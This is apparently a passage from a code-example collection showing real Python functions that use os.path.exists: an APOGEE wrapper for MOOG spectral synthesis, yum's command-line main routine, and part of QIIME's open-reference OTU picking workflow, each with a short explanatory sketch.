    doflux= kwargs.pop('doflux',False)
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    width= kwargs.pop('width',_WIDTH_DEFAULT)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'1.01',
                   '606.01213':'90',
                   '606.01313':'180',
                   '607.01214':'1.01',
                   '607.01314':'90',
                   '607.01215':'273',
                   '608.01216':'1.01',
                   '608.01316':'90',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'0.91',
                   '606.01213':'8',
                   '606.01313':'81',
                   '607.01214':'0.91',
                   '607.01314':'8',
                   '607.01215':'273',
                   '608.01216':'0.91',
                   '608.01316':'8',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # Get the filename of the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            modelfilename= modelatm
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input is a non-existing filename')
        else:
            raise ValueError('modelatm= in moogsynth should be set to the name of a file')
    else:
        modelfilename= appath.modelAtmospherePath(**kwargs)
    # Check whether a MOOG version exists
    if not os.path.exists(modelfilename.replace('.mod','.org')):
        # Convert to MOOG format
        convert_modelAtmosphere(modelatm=modelfilename,**kwargs)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelist
    if linelist is None:
        linelistfilename= modelbasename.replace('.mod','.lines')
        if not os.path.exists(os.path.join(modeldirname,linelistfilename)):
            raise IOError('No linelist given and no weed-out version found for this atmosphere; either specify a linelist or run weedout first')
        linelistfilename= os.path.join(modeldirname,linelistfilename)
    elif os.path.exists(linelist):
        linelistfilename= linelist
    else:
        linelistfilename= appath.linelistPath(linelist,
                                              dr=kwargs.get('dr',None))
    if not os.path.exists(linelistfilename):
        raise RuntimeError("Linelist %s not found; download linelist w/ apogee.tools.download.linelist (if you have access)" % linelistfilename)
    # We will run in a subdirectory of the relevant model atmosphere
    tmpDir= tempfile.mkdtemp(dir=modeldirname)
    shutil.copy(linelistfilename,tmpDir)
    # Cut the linelist to the desired wavelength range
    with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
        awkfile.write('$1>%.3f && $1<%.3f\n' %(wmin-width,wmax+width))
    keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
    stderr= open('/dev/null','w')
    try:
        subprocess.check_call(['awk','-f','cutlines.awk',
                               os.path.basename(linelistfilename)],
                              cwd=tmpDir,stdout=keeplines,stderr=stderr)
        keeplines.close()
        shutil.copy(os.path.join(tmpDir,'lines.tmp'),
                    os.path.join(tmpDir,os.path.basename(linelistfilename)))
    except subprocess.CalledProcessError:
        print("Removing unnecessary linelist entries failed ...")
    finally:
        os.remove(os.path.join(tmpDir,'cutlines.awk'))
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        stderr.close()
    # Also copy the strong lines
    stronglinesfilename= appath.linelistPath('stronglines.vac',
                                             dr=kwargs.get('dr',None))
    if not os.path.exists(stronglinesfilename):
        try:
            download.linelist('stronglines.vac',dr=kwargs.get('dr',None))
        except:
            raise RuntimeError("Linelist stronglines.vac not found or downloading failed; download linelist w/ apogee.tools.download.linelist (if you have access)")
        finally:
            if os.path.exists(os.path.join(tmpDir,'synth.par')):
                os.remove(os.path.join(tmpDir,'synth.par'))
            if os.path.exists(os.path.join(tmpDir,'std.out')):
                os.remove(os.path.join(tmpDir,'std.out'))
            if os.path.exists(os.path.join(tmpDir,
                                           os.path.basename(linelistfilename))):
                os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
            if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
                os.remove(os.path.join(tmpDir,'stronglines.vac'))
            os.rmdir(tmpDir)
    shutil.copy(stronglinesfilename,tmpDir)
    # Now write the script file
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    nsynths= numpy.array([len(args[ii])-1 for ii in range(len(args))])
    nsynth= numpy.amax(nsynths) #Take the longest abundance list
    if nsynth > 5:
        raise ValueError("MOOG only allows five syntheses to be run at the same time; please reduce the number of abundance values in the apogee.modelspec.moog.moogsynth input")
    nabu= len(args)
    with open(os.path.join(tmpDir,'synth.par'),'w') as parfile:
        if doflux:
            parfile.write('doflux\n')
        else:
            parfile.write('synth\n')
        parfile.write('terminal x11\n')
        parfile.write('plot 1\n')
        parfile.write("standard_out std.out\n")
        parfile.write("summary_out '../synth.out'\n")
        parfile.write("smoothed_out '/dev/null'\n")
        parfile.write("strong 1\n")
        parfile.write("damping 0\n")
        parfile.write("stronglines_in stronglines.vac\n")
        parfile.write("model_in '../%s'\n" % modelbasename.replace('.mod','.org'))
        parfile.write("lines_in %s\n" % os.path.basename(linelistfilename))
        parfile.write("atmosphere 1\n")
        parfile.write("molecules 2\n")
        parfile.write("lines 1\n")
        parfile.write("flux/int 0\n")
        # Write the isotopes
        niso= len(isotopes)
        parfile.write("isotopes %i %i\n" % (niso,nsynth))
        for iso in isotopes:
            isotopestr= iso
            for ii in range(nsynth):
                isotopestr+= ' '+isotopes[iso]
            parfile.write(isotopestr+'\n')
        # Abundances
        parfile.write("abundances %i %i\n" % (nabu,nsynth))
        for ii in range(nabu):
            abustr= '%i' % args[ii][0]
            for jj in range(nsynth):
                try:
                    abustr+= ' %.3f' % args[ii][jj+1]
                except IndexError:
                    abustr+= ' 0.0'
            parfile.write(abustr+"\n")
        # Synthesis limits
        parfile.write("synlimits\n") # Add 0.001 to make sure wmax is included
        parfile.write("%.3f  %.3f  %.3f  %.3f\n" % (wmin,wmax+0.001,dw,width))
    # Now run synth
    sys.stdout.write('\r'+"Running MOOG synth ...\r")
    sys.stdout.flush()
    try:
        p= subprocess.Popen(['moogsilent'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
        p.stdin.write(b'synth.par\n')
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        print("Running synth failed ...")
    finally:
        if os.path.exists(os.path.join(tmpDir,'synth.par')):
            os.remove(os.path.join(tmpDir,'synth.par'))
        if os.path.exists(os.path.join(tmpDir,'std.out')):
            os.remove(os.path.join(tmpDir,'std.out'))
        if os.path.exists(os.path.join(tmpDir,
                                       os.path.basename(linelistfilename))):
            os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
        if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
            os.remove(os.path.join(tmpDir,'stronglines.vac'))
        os.rmdir(tmpDir)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()        
    # Now read the output
    wavs= numpy.arange(wmin,wmax+dw,dw)
    if wavs[-1] > wmax+dw/2.: wavs= wavs[:-1]
    if doflux:
        contdata= numpy.loadtxt(os.path.join(modeldirname,'synth.out'),
                                converters={0:lambda x: x.replace('D','E'),
                                            1:lambda x: x.replace('D','E')},
                                usecols=[0,1])
        # Wavelength in summary file appears to be wrong from comparing to 
        # the standard output file
        out= contdata[:,1]
        out/= numpy.nanmean(out) # Make the numbers more manageable
    else:
        with open(os.path.join(modeldirname,'synth.out')) as summfile:
            out= numpy.empty((nsynth,len(wavs)))
            for ii in range(nsynth):
                # Skip to beginning of synthetic spectrum
                while True:
                    line= summfile.readline()
                    if line[0] == 'M': break
                summfile.readline()
                tout= []
                while True:
                    line= summfile.readline()
                    if not line or line[0] == 'A': break
                    tout.extend([float(s) for s in line.split()])
                out[ii]= numpy.array(tout)
    os.remove(os.path.join(modeldirname,'synth.out'))
    if doflux:
        return (wavs,out)
    else:
        return (wavs,1.-out)
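
Throughout moogsynth, os.path.exists does double duty: it validates the model atmosphere and linelist paths up front, and in the finally blocks it guards cleanup so that only scratch files which were actually created get removed before os.rmdir deletes the temporary directory. A minimal sketch of that guarded-cleanup idiom, with placeholder file names (run.par, run.log) rather than MOOG's real ones:

import os
import tempfile

tmp_dir = tempfile.mkdtemp()
try:
    # ... the run writes whatever scratch files it needs ...
    with open(os.path.join(tmp_dir, 'run.par'), 'w') as parfile:
        parfile.write('synth\n')
finally:
    # Remove only the scratch files that actually exist, then the directory;
    # os.rmdir raises if anything unexpected is still inside it.
    for name in ('run.par', 'run.log'):
        path = os.path.join(tmp_dir, name)
        if os.path.exists(path):
            os.remove(path)
    os.rmdir(tmp_dir)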

Example 144

Project: yum
Source File: yummain.py
View license
def main(args):
    """Run the yum program from a command line interface."""

    yum.misc.setup_locale(override_time=True)

    def exUserCancel():
        logger.critical(_('\n\nExiting on user cancel'))
        if unlock(): return 200
        return 1

    def exIOError(e):
        if e.errno == 32:
            logger.critical(_('\n\nExiting on Broken Pipe'))
        else:
            logger.critical(_('\n\n%s') % exception2msg(e))
        if unlock(): return 200
        return 1

    def exPluginExit(e):
        '''Called when a plugin raises PluginYumExit.

        Log the plugin's exit message if one was supplied.
        ''' # ' xemacs hack
        exitmsg = exception2msg(e)
        if exitmsg:
            logger.warn('\n\n%s', exitmsg)
        if unlock(): return 200
        return 1

    def exFatal(e):
        logger.critical('\n\n%s', exception2msg(e.value))
        if unlock(): return 200
        return 1

    def exRepoError(e):
        # For RepoErrors ... help out by forcing new repodata next time.
        # XXX: clean only the repo that has failed?
        base.cleanExpireCache()

        msg = _("""\
 One of the configured repositories failed (%(repo)s),
 and yum doesn't have enough cached data to continue. At this point the only
 safe thing yum can do is fail. There are a few ways to work "fix" this:

     1. Contact the upstream for the repository and get them to fix the problem.

     2. Reconfigure the baseurl/etc. for the repository, to point to a working
        upstream. This is most often useful if you are using a newer
        distribution release than is supported by the repository (and the
        packages for the previous distribution release still work).

     3. Run the command with the repository temporarily disabled
            yum --disablerepo=%(repoid)s ...

     4. Disable the repository permanently, so yum won't use it by default. Yum
        will then just ignore the repository until you permanently enable it
        again or use --enablerepo for temporary usage:

            yum-config-manager --disable %(repoid)s
        or
            subscription-manager repos --disable=%(repoid)s

     5. Configure the failing repository to be skipped, if it is unavailable.
        Note that yum will try to contact the repo. when it runs most commands,
        so will have to try and fail each time (and thus yum will be much
        slower). If it is a very temporary problem though, this is often a nice
        compromise:

            yum-config-manager --save --setopt=%(repoid)s.skip_if_unavailable=true
""")

        repoui = _('Unknown')
        repoid = _('<repoid>')
        try:
            repoid = e.repo.id
            repoui = e.repo.name
        except AttributeError:
            pass

        msg = msg % {'repoid' : repoid, 'repo' : repoui}

        logger.critical('\n\n%s\n%s', msg, exception2msg(e))

        if unlock(): return 200
        return 1

    def unlock():
        try:
            base.closeRpmDB()
            base.doUnlock()
        except Errors.LockError, e:
            return 200
        return 0

    def rpmdb_warn_checks():
        try:
            probs = base._rpmdb_warn_checks(out=verbose_logger.info, warn=False)
        except Errors.YumBaseError, e:
            # This is mainly for PackageSackError from rpmdb.
            verbose_logger.info(_(" Yum checks failed: %s"), exception2msg(e))
            probs = []
        if not probs:
            verbose_logger.info(_(" You could try running: rpm -Va --nofiles --nodigest"))

    logger = logging.getLogger("yum.main")
    verbose_logger = logging.getLogger("yum.verbose.main")

    # Try to open the current directory to see if we have 
    # read and execute access. If not, chdir to /
    try:
        f = open(".")
    except IOError, e:
        if e.errno == errno.EACCES:
            logger.critical(_('No read/execute access in current directory, moving to /'))
            os.chdir("/")
    else:
        f.close()
    try:
        os.getcwd()
    except OSError, e:
        if e.errno == errno.ENOENT:
            logger.critical(_('No getcwd() access in current directory, moving to /'))
            os.chdir("/")

    # our core object for the cli
    base = cli.YumBaseCli()

    # do our cli parsing and config file setup
    # also sanity check the things being passed on the cli
    try:
        base.getOptionsConfig(args)
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.YumBaseError, e:
        return exFatal(e)
    except (OSError, IOError), e:
        return exIOError(e)

    try:
        base.waitForLock()
    except Errors.YumBaseError, e:
        return exFatal(e)

    try:
        result, resultmsgs = base.doCommands()
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        result = 1
        resultmsgs = [exception2msg(e)]
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)

    # Act on the command/shell result
    if result == 0:
        # Normal exit 
        for msg in resultmsgs:
            verbose_logger.log(logginglevels.INFO_2, '%s', msg)
        if unlock(): return 200
        return base.exit_code
    elif result == 1:
        # Fatal error
        for msg in resultmsgs:
            logger.critical(_('Error: %s'), msg)
        if unlock(): return 200
        return 1
    elif result == 2:
        # Continue on
        pass
    elif result == 100:
        if unlock(): return 200
        return 100
    else:
        logger.critical(_('Unknown Error(s): Exit Code: %d:'), result)
        for msg in resultmsgs:
            logger.critical(msg)
        if unlock(): return 200
        return 3

    # Mainly for ostree, but might be useful for others.
    if base.conf.usr_w_check:
        usrinstpath = base.conf.installroot + "/usr"
        usrinstpath = usrinstpath.replace('//', '/')
        if (os.path.exists(usrinstpath) and
            not os.access(usrinstpath, os.W_OK)):
            logger.critical(_('No write access to %s directory') % usrinstpath)
            logger.critical(_('  Maybe this is an ostree image?'))
            logger.critical(_('  To disable you can use --setopt=usr_w_check=false'))
            if unlock(): return 200
            return 1
            
    # Depsolve stage
    verbose_logger.log(logginglevels.INFO_2, _('Resolving Dependencies'))

    try:
        (result, resultmsgs) = base.buildTransaction() 
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        result = 1
        resultmsgs = [exception2msg(e)]
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)
   
    # Act on the depsolve result
    if result == 0:
        # Normal exit
        if unlock(): return 200
        return base.exit_code
    elif result == 1:
        # Fatal error
        for prefix, msg in base.pretty_output_restring(resultmsgs):
            logger.critical(prefix, msg)
        if base._depsolving_failed:
            if not base.conf.skip_broken:
                verbose_logger.info(_(" You could try using --skip-broken to work around the problem"))
            rpmdb_warn_checks()
        if unlock(): return 200
        return 1
    elif result == 2:
        # Continue on
        pass
    else:
        logger.critical(_('Unknown Error(s): Exit Code: %d:'), result)
        for msg in resultmsgs:
            logger.critical(msg)
        if unlock(): return 200
        return 3

    verbose_logger.log(logginglevels.INFO_2, _('\nDependencies Resolved'))

    # Run the transaction
    try:
        inhibit = {'what' : 'shutdown:idle',
                   'who'  : 'yum cli',
                   'why'  : 'Running transaction', # i18n?
                   'mode' : 'block'}
        return_code = base.doTransaction(inhibit=inhibit)
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        return exFatal(e)
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)

    # rpm ts.check() failed.
    if type(return_code) == type((0,)) and len(return_code) == 2:
        (result, resultmsgs) = return_code
        for msg in resultmsgs:
            logger.critical("%s", msg)
        rpmdb_warn_checks()
        return_code = result
        if base._ts_save_file:
            verbose_logger.info(_("Your transaction was saved, rerun it with:\n yum load-transaction %s") % base._ts_save_file)
    elif return_code < 0:
        return_code = 1 # Means the pre-transaction checks failed...
        #  This includes:
        # . No packages.
        # . Hitting N at the prompt.
        # . GPG check failures.
        if base._ts_save_file:
            verbose_logger.info(_("Your transaction was saved, rerun it with:\n yum load-transaction %s") % base._ts_save_file)
    else:
        verbose_logger.log(logginglevels.INFO_2, _('Complete!'))

    if unlock(): return 200
    return return_code or base.exit_code
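
Near the end of main(), the usr_w_check block combines os.path.exists with os.access: a missing /usr is ignored, but a /usr that exists and is not writable (for example on an ostree image) aborts the run. A minimal sketch of that check in isolation; usr_is_writable is a hypothetical helper, not part of yum:

import os

def usr_is_writable(installroot="/"):
    """Return False only when <installroot>/usr exists but is not writable."""
    usr_path = (installroot + "/usr").replace("//", "/")
    return not (os.path.exists(usr_path) and not os.access(usr_path, os.W_OK))

if not usr_is_writable("/"):
    print("No write access to /usr; maybe this is an ostree image?")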

Example 145

Project: qiime
Source File: pick_open_reference_otus.py
View license
def pick_subsampled_open_reference_otus(input_fp,
                                        refseqs_fp,
                                        output_dir,
                                        percent_subsample,
                                        new_ref_set_id,
                                        command_handler,
                                        params,
                                        qiime_config,
                                        prefilter_refseqs_fp=None,
                                        run_assign_tax=True,
                                        run_align_and_tree=True,
                                        prefilter_percent_id=None,
                                        min_otu_size=2,
                                        step1_otu_map_fp=None,
                                        step1_failures_fasta_fp=None,
                                        parallel=False,
                                        suppress_step4=False,
                                        logger=None,
                                        suppress_md5=False,
                                        suppress_index_page=False,
                                        denovo_otu_picking_method='uclust',
                                        reference_otu_picking_method='uclust_ref',
                                        status_update_callback=print_to_stdout,
                                        minimum_failure_threshold=100000):
    """ Run the data preparation steps of Qiime

        The steps performed by this function are:
          - Pick reference OTUs against refseqs_fp
          - Subsample the failures to n sequences.
          - Pick OTUs de novo on the n failures.
          - Pick representative sequences for the resulting OTUs.
          - Pick reference OTUs on all failures using the
             representative set from step 4 as the reference set.

    """
    # for now only allowing uclust/usearch/sortmerna+sumaclust for otu picking
    allowed_denovo_otu_picking_methods = ['uclust', 'usearch61', 'sumaclust']
    allowed_reference_otu_picking_methods = ['uclust_ref', 'usearch61_ref',
                                             'sortmerna']
    assert denovo_otu_picking_method in allowed_denovo_otu_picking_methods,\
        "Unknown de novo OTU picking method: %s. Known methods are: %s"\
        % (denovo_otu_picking_method,
           ','.join(allowed_denovo_otu_picking_methods))

    assert reference_otu_picking_method in allowed_reference_otu_picking_methods,\
        "Unknown reference OTU picking method: %s. Known methods are: %s"\
        % (reference_otu_picking_method,
           ','.join(allowed_reference_otu_picking_methods))

    # Prepare some variables for the later steps
    index_links = []
    input_dir, input_filename = split(input_fp)
    input_basename, input_ext = splitext(input_filename)
    create_dir(output_dir)
    commands = []
    if logger is None:
        log_fp = generate_log_fp(output_dir)
        logger = WorkflowLogger(log_fp,
                                params=params,
                                qiime_config=qiime_config)

        close_logger_on_success = True
        index_links.append(
                ('Run summary data',
                log_fp,
                _index_headers['run_summary']))
    else:
        close_logger_on_success = False


    if not suppress_md5:
        log_input_md5s(logger, [input_fp,
                                refseqs_fp,
                                step1_otu_map_fp,
                                step1_failures_fasta_fp])

    # If the user has not passed a different reference collection for the pre-filter,
    # use the main refseqs_fp. This is useful if the user wants to provide a smaller
    # reference collection, or to use the input reference collection when running in
    # iterative mode (rather than an iteration's new refseqs).
    if prefilter_refseqs_fp is None:
        prefilter_refseqs_fp = refseqs_fp

    # Step 1: Closed-reference OTU picking on the input file (if not already
    # complete)
    if step1_otu_map_fp and step1_failures_fasta_fp:
        step1_dir = '%s/step1_otus' % output_dir
        create_dir(step1_dir)
        logger.write("Using pre-existing reference otu map and failures.\n\n")
    else:
        if prefilter_percent_id is not None:
            prefilter_dir = '%s/prefilter_otus/' % output_dir
            prefilter_failures_list_fp = '%s/%s_failures.txt' % \
                (prefilter_dir, input_basename)
            prefilter_pick_otu_cmd = pick_reference_otus(
                input_fp, prefilter_dir, reference_otu_picking_method,
                prefilter_refseqs_fp, parallel, params, logger, prefilter_percent_id)
            commands.append(
                [('Pick Reference OTUs (prefilter)', prefilter_pick_otu_cmd)])

            prefiltered_input_fp = '%s/prefiltered_%s%s' %\
                (prefilter_dir, input_basename, input_ext)
            filter_fasta_cmd = 'filter_fasta.py -f %s -o %s -s %s -n' %\
                (input_fp, prefiltered_input_fp, prefilter_failures_list_fp)
            commands.append(
                [('Filter prefilter failures from input', filter_fasta_cmd)])
            index_links.append(
            ('Pre-filtered sequence identifiers '
             '(failed to hit reference at %1.1f%% identity)' % (float(prefilter_percent_id)*100),
                        prefilter_failures_list_fp,
                        _index_headers['sequences']))


            # Call the command handler on the list of commands
            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []

            input_fp = prefiltered_input_fp
            input_dir, input_filename = split(input_fp)
            input_basename, input_ext = splitext(input_filename)
            if getsize(prefiltered_input_fp) == 0:
                raise ValueError(
                    "All sequences were discarded by the prefilter. "
                    "Are the input sequences in the same orientation "
                    "in your input file and reference file (you can "
                    "add 'pick_otus:enable_rev_strand_match True' to "
                    "your parameters file if not)? Are you using the "
                    "correct reference file?")

        # Build the OTU picking command
        step1_dir = \
            '%s/step1_otus' % output_dir
        step1_otu_map_fp = \
            '%s/%s_otus.txt' % (step1_dir, input_basename)
        step1_pick_otu_cmd = pick_reference_otus(
            input_fp, step1_dir, reference_otu_picking_method,
            refseqs_fp, parallel, params, logger)
        commands.append([('Pick Reference OTUs', step1_pick_otu_cmd)])

        # Build the failures fasta file
        step1_failures_list_fp = '%s/%s_failures.txt' % \
            (step1_dir, input_basename)
        step1_failures_fasta_fp = \
            '%s/failures.fasta' % step1_dir
        step1_filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
            (input_fp, step1_failures_list_fp, step1_failures_fasta_fp)

        commands.append([('Generate full failures fasta file',
                          step1_filter_fasta_cmd)])

        # Call the command handler on the list of commands
        command_handler(commands,
                        status_update_callback,
                        logger=logger,
                        close_logger_on_success=False)
        commands = []

    step1_repset_fasta_fp = \
        '%s/step1_rep_set.fna' % step1_dir
    step1_pick_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
        (step1_otu_map_fp, step1_repset_fasta_fp, input_fp)
    commands.append([('Pick rep set', step1_pick_rep_set_cmd)])

    # Call the command handler on the list of commands
    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)
    commands = []
    # name the final otu map
    merged_otu_map_fp = '%s/final_otu_map.txt' % output_dir

    # count number of sequences in step 1 failures fasta file
    with open(abspath(step1_failures_fasta_fp), 'U') as step1_failures_fasta_f:
        num_failure_seqs, mean, std = count_seqs_from_file(step1_failures_fasta_f)

    # number of failures sequences is greater than the threshold,
    # continue to step 2,3 and 4
    run_step_2_and_3 = num_failure_seqs > minimum_failure_threshold

    if run_step_2_and_3:

        # Subsample the failures fasta file to retain (roughly) the
        # percent_subsample
        step2_dir = '%s/step2_otus/' % output_dir
        create_dir(step2_dir)
        step2_input_fasta_fp = \
                               '%s/subsampled_failures.fasta' % step2_dir
        subsample_fasta(step1_failures_fasta_fp,
                        step2_input_fasta_fp,
                        percent_subsample)

        logger.write('# Subsample the failures fasta file using API \n' +
                 'python -c "import qiime; qiime.util.subsample_fasta' +
                 '(\'%s\', \'%s\', \'%f\')"\n\n' % (abspath(step1_failures_fasta_fp),
                                                    abspath(
                                                        step2_input_fasta_fp),
                                                    percent_subsample))

        # Prep the OTU picking command for the subsampled failures
        step2_cmd = pick_denovo_otus(step2_input_fasta_fp,
                                     step2_dir,
                                     new_ref_set_id,
                                     denovo_otu_picking_method,
                                     params,
                                     logger)
        step2_otu_map_fp = '%s/subsampled_failures_otus.txt' % step2_dir

        commands.append([('Pick de novo OTUs for new clusters', step2_cmd)])

        # Prep the rep set picking command for the subsampled failures
        step2_repset_fasta_fp = '%s/step2_rep_set.fna' % step2_dir
        step2_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
            (step2_otu_map_fp, step2_repset_fasta_fp, step2_input_fasta_fp)
        commands.append(
            [('Pick representative set for subsampled failures', step2_rep_set_cmd)])

        step3_dir = '%s/step3_otus/' % output_dir
        step3_otu_map_fp = '%s/failures_otus.txt' % step3_dir
        step3_failures_list_fp = '%s/failures_failures.txt' % step3_dir

        # remove the indexed reference database from the dictionary of
        # parameters as it must be forced to build a new database
        # using the step2_repset_fasta_fp
        if reference_otu_picking_method == 'sortmerna':
            if 'sortmerna_db' in params['pick_otus']:
                del params['pick_otus']['sortmerna_db']

        step3_cmd = pick_reference_otus(
            step1_failures_fasta_fp,
            step3_dir,
            reference_otu_picking_method,
            step2_repset_fasta_fp,
            parallel,
            params,
            logger)

        commands.append([
            ('Pick reference OTUs using de novo rep set', step3_cmd)])

        index_links.append(
            ('Final map of OTU identifier to sequence identifiers (i.e., "OTU map")',
             merged_otu_map_fp,
             _index_headers['otu_maps']))

    if not suppress_step4:
        step4_dir = '%s/step4_otus/' % output_dir
        if run_step_2_and_3:
            step3_failures_fasta_fp = '%s/failures_failures.fasta' % step3_dir
            step3_filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
                (step1_failures_fasta_fp,
                 step3_failures_list_fp, step3_failures_fasta_fp)
            commands.append([('Create fasta file of step3 failures',
                            step3_filter_fasta_cmd)])

            failures_fp = step3_failures_fasta_fp
            failures_otus_fp = 'failures_failures_otus.txt'
            failures_step = 'step3'
        else:
            failures_fp = step1_failures_fasta_fp
            failures_otus_fp = 'failures_otus.txt'
            failures_step = 'step1'
            step3_otu_map_fp = ""

        step4_cmd = pick_denovo_otus(failures_fp,
                                     step4_dir,
                                     '.'.join([new_ref_set_id, 'CleanUp']),
                                     denovo_otu_picking_method,
                                     params,
                                     logger)

        step4_otu_map_fp = '%s/%s' % (step4_dir, failures_otus_fp)
        commands.append([('Pick de novo OTUs on %s failures' % failures_step, step4_cmd)])

        # Merge the otu maps, note that we are explicitly using the '>' operator
        # otherwise passing the --force flag on the script interface would
        # append the newly created maps to the map that was previously created
        cat_otu_tables_cmd = 'cat %s %s %s > %s' %\
            (step1_otu_map_fp, step3_otu_map_fp,
             step4_otu_map_fp, merged_otu_map_fp)
        commands.append([('Merge OTU maps', cat_otu_tables_cmd)])
        step4_repset_fasta_fp = '%s/step4_rep_set.fna' % step4_dir
        step4_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
            (step4_otu_map_fp, step4_repset_fasta_fp, failures_fp)
        commands.append(
            [('Pick representative set for subsampled failures', step4_rep_set_cmd)])
    else:
        # Merge the otu maps, note that we are explicitly using the '>' operator
        # otherwise passing the --force flag on the script interface would
        # append the newly created maps to the map that was previously created
        if run_step_2_and_3:
            failures_fp = step3_failures_list_fp
        else:
            failures_fp = step1_failures_list_fp
            step3_otu_map_fp = ""

        cat_otu_tables_cmd = 'cat %s %s > %s' %\
            (step1_otu_map_fp, step3_otu_map_fp, merged_otu_map_fp)
        commands.append([('Merge OTU maps', cat_otu_tables_cmd)])

        # Move the step 3 failures file to the top-level directory
        commands.append([('Move final failures file to top-level directory',
                          'mv %s %s/final_failures.txt' % (failures_fp, output_dir))])

    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)
    commands = []

    otu_fp = merged_otu_map_fp
    # Filter singletons from the otu map
    otu_no_singletons_fp = '%s/final_otu_map_mc%d.txt' % (output_dir,
                                                          min_otu_size)

    otus_to_keep = filter_otus_from_otu_map(
        otu_fp,
        otu_no_singletons_fp,
        min_otu_size)

    index_links.append(('Final map of OTU identifier to sequence identifiers excluding '
                        'OTUs with fewer than %d sequences' % min_otu_size,
                        otu_no_singletons_fp,
                        _index_headers['otu_maps']))

    logger.write('# Filter singletons from the otu map using API \n' +
                 'python -c "import qiime; qiime.filter.filter_otus_from_otu_map' +
                 '(\'%s\', \'%s\', \'%d\')"\n\n' % (abspath(otu_fp),
                                                    abspath(
                                                        otu_no_singletons_fp),
                                                    min_otu_size))

    # make the final representative seqs file and a new refseqs file that
    # could be used in subsequent otu picking runs.
    # This is clunky. First, we need to do this without singletons to match
    # the otu map without singletons. Second, the reference set and the rep
    # set serve different purposes: the reference set needs to be a superset
    # of the input reference set, while the rep set should contain only the
    # sequences that were observed in this data set. We also want the reps
    # for the step1 reference otus to be reads from this run, so we don't
    # hit issues building a tree from sequences of very different lengths.
    final_repset_fp = '%s/rep_set.fna' % output_dir
    index_links.append(
        ('OTU representative sequences',
         final_repset_fp,
         _index_headers['sequences']))
    final_repset_f = open(final_repset_fp, 'w')
    new_refseqs_fp = '%s/new_refseqs.fna' % output_dir
    index_links.append(
        ('New reference sequences (i.e., OTU representative sequences plus input '
         'reference sequences)',
         new_refseqs_fp,
         _index_headers['sequences']))
    # write non-singleton otus representative sequences from step1 to the
    # final rep set file
    for otu_id, seq in parse_fasta(open(step1_repset_fasta_fp, 'U')):
        if otu_id.split()[0] in otus_to_keep:
            final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    logger.write('# Write non-singleton otus representative sequences ' +
                 'from step1 to the final rep set file: %s\n\n' % final_repset_fp)
    # copy the full input refseqs file to the new refseqs_fp
    copyfile(refseqs_fp, new_refseqs_fp)
    new_refseqs_f = open(new_refseqs_fp, 'a')
    new_refseqs_f.write('\n')
    logger.write('# Copy the full input refseqs file to the new refseq file\n' +
                 'cp %s %s\n\n' % (refseqs_fp, new_refseqs_fp))
    # iterate over all representative sequences from step2 and step4 and write
    # those corresponding to non-singleton otus to the final representative set
    # file and the new reference sequences file.
    if run_step_2_and_3:
        for otu_id, seq in parse_fasta(open(step2_repset_fasta_fp, 'U')):
            if otu_id.split()[0] in otus_to_keep:
                new_refseqs_f.write('>%s\n%s\n' % (otu_id, seq))
                final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    if not suppress_step4:
        for otu_id, seq in parse_fasta(open(step4_repset_fasta_fp, 'U')):
            if otu_id.split()[0] in otus_to_keep:
